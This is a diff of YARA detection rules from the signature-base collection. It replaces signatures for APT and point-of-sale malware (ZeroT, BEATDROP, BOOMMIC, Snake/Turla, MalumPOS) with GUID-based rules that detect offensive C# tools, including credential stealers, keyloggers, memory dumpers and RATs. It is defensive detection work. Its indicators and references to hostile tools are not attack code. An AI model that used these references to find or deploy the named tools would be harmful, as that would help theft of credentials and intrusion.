-rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Go : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharploginprompt : FILE
 {
 	meta:
-		description = "Chinese APT by Proofpoint ZeroT RAT  - file Go.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ba929e6d-4162-58e7-b8a8-bcb066b64522"
-		date = "2017-02-04"
-		modified = "2023-01-06"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L180-L203"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e9a493d9-21b6-5ff1-9e5e-e8fbacc34c0c"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/shantanu561993/SharpLoginPrompt"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L173-L186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf5e2d825e4bd63e94455ffb4013fa1088098a826390c1916c0aa50866588fcb"
+		logic_hash = "e8abbc67d568956bf98e733b1e98910d0501225d4a0dc0bec6be9b572fcc2b36"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "83ddc69fe0d3f3d2f46df7e72995d59511c1bfcca1a4e14c330cb71860b4806b"
 
 	strings:
-		$x1 = "%s\\cmd.exe /c %s\\Zlh.exe" fullword ascii
-		$x2 = "\\BypassUAC.VS2010\\Release\\" ascii
-		$s1 = "Zjdsf.exe" fullword ascii
-		$s2 = "SS32prep.exe" fullword ascii
-		$s3 = "windowsgrep.exe" fullword ascii
-		$s4 = "Sysdug.exe" fullword ascii
-		$s5 = "Proessz.exe" fullword ascii
-		$s6 = "%s\\Zlh.exe" fullword ascii
-		$s7 = "/C %s\\%s" fullword ascii
+		$typelibguid0lo = "c12e69cd-78a0-4960-af7e-88cbd794af97" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 7 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Mcutil : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Adamantium_Thief : FILE
 {
 	meta:
-		description = "Chinese APT by Proofpoint ZeroT RAT  - file Mcutil.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c887d36b-8aeb-54f1-a683-727561723238"
-		date = "2017-02-04"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L205-L223"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "82225b2e-ab4a-50b8-a3fd-7ad4947d052e"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/LimerBoy/Adamantium-Thief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L188-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "edb6000fd65d6593bd94842e60ec099c5a652d10005f81d17063dba1a2e267d2"
+		logic_hash = "37303dd37952d08ca2f85d03b4a9a8d52a3c55870e1350bca7ac84749942dfd8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "266c06b06abbed846ebabfc0e683f5d20dadab52241bc166b9d60e9b8493b500"
 
 	strings:
-		$s1 = "LoaderDll.dll" fullword ascii
-		$s2 = "QageBox1USER" fullword ascii
-		$s3 = "xhmowl" fullword ascii
-		$s4 = "?KEYKY" fullword ascii
-		$s5 = "HH:mm:_s" fullword ascii
-		$s6 = "=licni] has maX0t" fullword ascii
+		$typelibguid0lo = "e6104bc9-fea9-4ee9-b919-28156c1f2ede" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 3 of them ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Zlh : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Psbypassclm : FILE
 {
 	meta:
-		description = "Chinese APT by Proofpoint ZeroT RAT - file Zlh.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4c8b9a90-6cb3-5aba-a993-f73207341d0e"
-		date = "2017-02-04"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L225-L241"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "dad6729f-3d96-5d2d-b72c-a96d1a3eae74"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/padovah4ck/PSByPassCLM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L203-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26796f75a8302bd6c93eb3ea43d0491b86770b52bd11aad6e1e250d968a77004"
+		logic_hash = "a2646ff961b5fc94035fae0b7e5afedc054dfcfe710701dbf9ba17674c2bb6c8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "711f0a635bbd6bf1a2890855d0bd51dff79021db45673541972fe6e1288f5705"
 
 	strings:
-		$s1 = "nflogger.dll" fullword wide
-		$s2 = "%s %d: CreateProcess('%s', '%s') failed. Windows error code is 0x%08x" fullword ascii
-		$s3 = "_StartZlhh(): Executed \"%s\"" ascii
-		$s4 = "Executable: '%s' (%s) %i" fullword ascii
+		$typelibguid0lo = "46034038-0113-4d75-81fd-eb3b483f2662" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_CHAOS_Payload : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Physmem2Profit : FILE
 {
 	meta:
-		description = "Detects a CHAOS back connect payload"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5057bc68-9bf8-54b4-88a1-d0c0cba62fa0"
-		date = "2017-07-15"
-		modified = "2023-12-05"
-		reference = "https://github.com/tiagorlampert/CHAOS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_chaos_payload.yar#L11-L26"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "75a27970-c469-53da-b0c3-b3d0faea0b6f"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/FSecureLABS/physmem2profit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L218-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ca409d3d0430fbc4c5ae52ce22616132da3a90c1ec3889571c6314e8787eee67"
-		score = 80
+		logic_hash = "57e6159bc047c372bb7fa9ac0f77183fe06fe3f41b83039f8b0185f2743cc774"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0962fcfcb1b52df148720c2112b036e75755f09279e3ebfce1636739af9b4448"
-		hash2 = "5c3553345f824b7b6de09ccb67d834e428b8df17443d98816471ca28f5a11424"
 
 	strings:
-		$x1 = { 2F 43 48 41 4F 53 00 02 73 79 6E 63 2F 61 74 6F 6D 69 63 }
+		$typelibguid0lo = "814708c9-2320-42d2-a45f-31e42da06a94" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_M_APT_Downloader_BEATDROP : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Noamci : FILE
 {
 	meta:
-		description = "Rule looking for BEATDROP malware"
-		author = "Mandiant"
-		id = "5720870e-8989-59f2-998b-019084d091ce"
-		date = "2022-04-28"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_apr22.yar#L1-L17"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5fab1551-9d35-53cf-a04f-c14370119553"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/med0x2e/NoAmci"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L233-L246"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7a766682cc9a057798cc569111bfcb611648c4a052c0dd664d983b80d5891255"
-		score = 90
+		logic_hash = "7d934503bab7318930f958b1818037f00d3d5be7f5f89f3b519c5072bb4fee03"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ntdll1 = "ntdll" ascii fullword
-		$ntdll2 = "C:\\Windows\\System32\\ntdll.dll" ascii fullword nocase
-		$url1 = "api.trello.com" ascii
-		$url2 = "/members/me/boards?key=" ascii
-		$url3 = "/cards?key=" ascii
+		$typelibguid0lo = "352e80ec-72a5-4aa6-aabe-4f9a20393e8e" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 1MB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_M_APT_Downloader_BOOMMIC : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpblock : FILE
 {
 	meta:
-		description = "Rule looking for BOOMMIC malware"
-		author = "Mandiant"
-		id = "34ea08a6-5d6f-5cdd-a629-fa36313c98f7"
-		date = "2022-04-28"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_apr22.yar#L19-L38"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b84538da-1b0e-50c7-abfa-e93d6de5a49b"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/CCob/SharpBlock"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L248-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c561b19464597f896d31307c0383fbc639cf4211600513e1251a3f59405bfed6"
+		logic_hash = "7bc689efc6f89ac685f1066da4e9735a0e2b985008679c51e14664cebdaebe4a"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$loc_10001000 = { 55 8B EC 8D 45 0C 50 8B 4D 08 51 6A 02 FF 15 [4] 85 C0 74 09 B8 01 00 00 00 EB 04 EB 02 33 C0 5D C3 }
-		$loc_100012fd = {6A 00 8D 55 EC 52 8B 45 D4 50 6A 05 8B 4D E4 51 FF 15 }
-		$func1 = "GetComputerNameExA" ascii
-		$func2 = "HttpQueryInfoA" ascii
+		$typelibguid0lo = "3cf25e04-27e4-4d19-945e-dadc37c81152" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 1MB and ( ( $loc_10001000 and $func1 ) or ( $loc_100012fd and $func2 ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_BAT2EXE_Bdargo_Converted_BAT : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Nopowershell : FILE
 {
 	meta:
-		description = "Detects binaries created with BDARGO Advanced BAT to EXE converter"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c9da4184-1530-5525-bdba-2dcc8a221bb1"
-		date = "2018-07-28"
-		modified = "2022-06-23"
-		reference = "https://www.majorgeeks.com/files/details/advanced_bat_to_exe_converter.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_bat2exe.yar#L2-L24"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0fd7496b-e34f-51f7-9270-ad424ed6a7a8"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/bitsadmin/nopowershell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L263-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "978aa25f1abd0cbd36e55da2b1ed4478a3a5b8b814988669c70e219cc2dd1afd"
-		score = 45
+		logic_hash = "5e4088d451cdc939608fb82f0259d3b60ce8247dfd2f76de839681c9e3d60414"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda"
-		hash1 = "a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88"
 
 	strings:
-		$s1 = "Error #bdembed1 -- Quiting" fullword ascii
-		$s2 = "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
-		$s3 = "\\a.txt" ascii
-		$s4 = "command.com" fullword ascii
-		$s6 = "DFDHERGDCV" fullword ascii
-		$s7 = "DFDHERGGZV" fullword ascii
-		$s8 = "%s%s%s%s%s%s%s%s" fullword ascii
+		$typelibguid0lo = "555ad0ac-1fdb-4016-8257-170a74cb2f55" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 5 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Snaketurla_Malware_May17_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Limelogger : FILE
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ddbbd602-b7f0-5e14-be0f-0c84bb22ddeb"
-		date = "2017-05-04"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L11-L25"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0798f01b-76b7-5c4d-9ddb-5e377b86f8b9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/LimeLogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L278-L291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12b18c9e03f1a471541de2fb3ecc6b90a13910ca299a9b7d2bad9dd11f881506"
+		logic_hash = "58588726f5f548b9aa948eac6d752404aa43fed18ccd4340422a652b9b061c9b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060"
 
 	strings:
-		$s1 = "/Users/vlad/Desktop/install/install/" ascii
+		$typelibguid0lo = "068d14ef-f0a1-4f9d-8e27-58b4317830c6" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0xfacf and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Snaketurla_Malware_May17_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aggressorscripts : FILE
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3e94016-591c-5e39-b5e7-328e0761e535"
-		date = "2017-05-04"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L27-L42"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d5903db5-010b-5b9d-8a5b-5d61aec52e7a"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/harleyQu1nn/AggressorScripts"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L293-L306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "35bd8650afbc515ecd1cef393fd75f9b77a1e31111612227f0f4557fe8b312a7"
+		logic_hash = "b5d84b6dea0290b901f1d911f341a2b15ab42cf9197775d9bb2f613f4baeb69d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea"
 
 	strings:
-		$s1 = "b_openssl: oops - number of mutexes is 0" fullword ascii
-		$s2 = "networksetup -get%sproxy Ethernet" fullword ascii
-		$s3 = "012A04DECBC441e49C527B2798F54CA7LOG_NAMED_PIPE_NAME" fullword ascii
+		$typelibguid0lo = "afd1ff09-2632-4087-a30c-43591f32e4e8" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0xfacf and filesize < 6000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Snaketurla_Malware_May17_4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Gopher : FILE
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "797dedd6-a13e-529f-bae4-4043294672c4"
-		date = "2017-05-04"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L44-L57"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e3015719-9085-584d-8237-f377ec995149"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/EncodeGroup/Gopher"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L308-L321"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7b6aac2313ea7dae572114e92ad0b5437c5be2542853de3b184bef780faee68b"
+		logic_hash = "430727d064ae07a4ca4411ee78fe74c684ce21d287283467c1afb9795545003e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2"
 
 	strings:
-		$s1 = "Install Adobe Flash Player.app/com.adobe.updatePK" fullword ascii
+		$typelibguid0lo = "b5152683-2514-49ce-9aca-1bc43df1e234" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x4b50 and filesize < 5000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Snaketurla_Installd_SH : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aviator : FILE
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "65a97c0d-5c69-5e58-9a18-10e5684bc218"
-		date = "2017-05-04"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L59-L72"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "52acd520-52aa-5bb9-ab3b-66a940aa5f5a"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/Ch0pin/AVIator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L323-L336"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b16107434951ddb212996909d53dfbcdae74ed13df6690ce3f6c74258ab4670"
+		logic_hash = "9101444f7d9306058a42b0325fefc0a088d1669932e4a6ba23b387829f01a097"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "PIDS=`ps cax | grep installdp" ascii
-		$s2 = "${SCRIPT_DIR}/installdp ${FILE}" ascii
+		$typelibguid0lo = "4885a4a3-4dfa-486c-b378-ae94a221661a" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Snaketurla_Install_SH : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Njcrypter : FILE
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "68775c54-46f8-5d44-ba63-6726d2bb8016"
-		date = "2017-05-04"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L74-L87"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c30c8323-9418-521a-a4fc-6be0113b99b5"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xPh0enix/njCrypter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L338-L352"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "019d20ca6632759cf01962d336c22831edc64b6927d8b27d026b76eb118fce02"
+		logic_hash = "2e3c616b75e15ad082cf0871b7ef8e04f0c2a937000f4bea6927962451ac7f12"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "${TARGET_PATH}/installd.sh" ascii
-		$s2 = "$TARGET_PATH2/com.adobe.update.plist" ascii
+		$typelibguid0lo = "8a87b003-4b43-467b-a509-0c8be05bf5a5" ascii wide
+		$typelibguid1lo = "80b13bff-24a5-4193-8e51-c62a414060ec" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Pos_Malware_Malumpos
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpminidump : FILE
 {
 	meta:
-		description = "Used to detect MalumPOS memory dumper"
-		author = "Trend Micro, Inc."
-		id = "6d85c7fe-bf1b-53fb-b618-4b0f8b63cae4"
-		date = "2015-05-25"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malumpos.yar#L1-L17"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e91e6711-d992-5a8a-97e6-1ed7847f38a4"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/b4rtik/SharpMiniDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L354-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ece32e51a12adf0d68420c8d98efbe7df27b9061ddfe4dcedf151f9f06287eee"
+		logic_hash = "eea9a60c5d0acb1ffa7cbfec59f2a3f7f29b507fba2c3694480627c583d24c97"
 		score = 75
-		quality = 60
-		tags = ""
-		sample_filtype = "exe"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string1 = "SOFTWARE\\Borland\\Delphi\\RTL"
-		$string2 = "B)[0-9]{13,19}\\"
-		$string3 = "[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\"
-		$string4 = "TRegExpr(exec): ExecNext Without Exec[Pos]"
-		$string5 = /Y:\\PROGRAMS\\.{20,300}\.pas/
+		$typelibguid0lo = "6ffccf81-6c3c-4d3f-b15f-35a86d0b497f" ascii wide
 
 	condition:
-		all of ( $string* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Uboatrat : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Cinarat : FILE
 {
 	meta:
-		description = "Detects UBoat RAT Samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f7f745c2-648d-5937-8d06-f5d1b6ed7e11"
-		date = "2017-11-29"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uboat_rat.yar#L9-L50"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c6b4c919-0fc6-5096-b29b-963142a2c831"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/wearelegal/CinaRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L369-L383"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3d0837607d1a5efd9986eccf98f108633502a09dbf8c4c94fc0f0247060bc3a8"
+		logic_hash = "d3e006450f3bd35d9d8b0d5c74470f555917d8b3583285ac3ac925ce2a83972b"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "04873dbd63279228a0a4bb1184933b64adb880e874bd3d14078161d06e232c9b"
-		hash2 = "7b32f401e2ad577e8398b2975ecb5c5ce68c5b07717b1e0d762f90a6fbd8add1"
